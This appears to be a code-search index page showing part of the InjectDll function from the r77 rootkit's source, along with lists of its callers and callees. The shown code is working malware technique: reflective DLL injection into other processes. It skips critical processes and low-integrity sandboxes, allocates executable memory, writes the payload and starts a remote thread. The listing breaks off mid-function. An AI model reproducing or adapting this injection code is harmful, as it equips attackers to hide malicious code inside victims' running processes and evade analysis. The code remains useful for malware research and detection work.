MCPcopy Index your code
hub / github.com/bytecode77/r77-rootkit / InjectDll

Function InjectDll

r77api/r77process.c:7–87  ·  view source on GitHub ↗

Source from the content-addressed store, hash-verified

5#include <Psapi.h>
6
7BOOL InjectDll(DWORD processId, LPBYTE dll, DWORD dllSize)
8{
9 BOOL result = FALSE;
10
11 // The bitness of the process must match the bitness of the DLL, otherwise the process will crash.
12 BOOL isProcess64Bit, isDll64Bit;
13 if (Is64BitProcess(processId, &isProcess64Bit) && IsExecutable64Bit(dll, &isDll64Bit) && isProcess64Bit == isDll64Bit)
14 {
15 HANDLE process = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, processId);
16 if (process)
17 {
18 // Check, if the executable name is on the exclusion list (see: PROCESS_EXCLUSIONS)
19 BOOL processExcluded = FALSE;
20 WCHAR processName[MAX_PATH + 1];
21 if (GetProcessFileName(processId, processName, MAX_PATH))
22 {
23 LPCWSTR exclusions[] = PROCESS_EXCLUSIONS;
24 for (ULONG i = 0; i < sizeof(exclusions) / sizeof(LPCWSTR); i++)
25 {
26 if (!StrCmpIW(processName, exclusions[i]))
27 {
28 processExcluded = TRUE;
29 break;
30 }
31 }
32 }
33
34 if (!processExcluded)
35 {
36 // Do not inject critical processes (smss, csrss, wininit, etc.).
37 ULONG breakOnTermination;
38 if (NT_SUCCESS(NtQueryInformationProcess(process, ProcessBreakOnTermination, &breakOnTermination, sizeof(ULONG), NULL)) && !breakOnTermination)
39 {
40 // Sandboxes tend to crash when injecting shellcode. Only inject medium IL and above.
41 DWORD integrityLevel;
42 if (GetProcessIntegrityLevel(process, &integrityLevel) && integrityLevel >= SECURITY_MANDATORY_MEDIUM_RID)
43 {
44 // Get function pointer to the shellcode that loads the DLL reflectively.
45 DWORD entryPoint = GetExecutableFunction(dll, "ReflectiveDllMain");
46 if (entryPoint)
47 {
48 LPBYTE allocatedMemory = (LPBYTE)VirtualAllocEx(process, NULL, dllSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
49 if (allocatedMemory)
50 {
51 if (WriteProcessMemory(process, allocatedMemory, dll, dllSize, NULL))
52 {
53 HANDLE thread = NULL;
54 if (NT_SUCCESS(R77_NtCreateThreadEx(&thread, 0x1fffff, NULL, process, allocatedMemory + entryPoint, allocatedMemory, 0, 0, 0, 0, NULL)))
55 {
56 if (WaitForSingleObject(thread, 100) == WAIT_OBJECT_0)
57 {
58 // Return TRUE, only if DllMain returned TRUE.
59 // DllMain returns FALSE, for example, if r77 is already injected.
60 DWORD exitCode;
61 if (GetExitCodeThread(thread, &exitCode))
62 {
63 result = exitCode != 0;
64 }

Callers 6

InjectAllProcessesFunction · 0.85
HookedNtResumeThreadFunction · 0.85
InjectFunction · 0.85
ChildProcessCallbackFunction · 0.85
NewProcessCallbackFunction · 0.85
ControlCallbackFunction · 0.85

Calls 6

Is64BitProcessFunction · 0.85
IsExecutable64BitFunction · 0.85
GetProcessFileNameFunction · 0.85
GetProcessIntegrityLevelFunction · 0.85
GetExecutableFunctionFunction · 0.85
R77_NtCreateThreadExFunction · 0.85

Tested by

no test coverage detected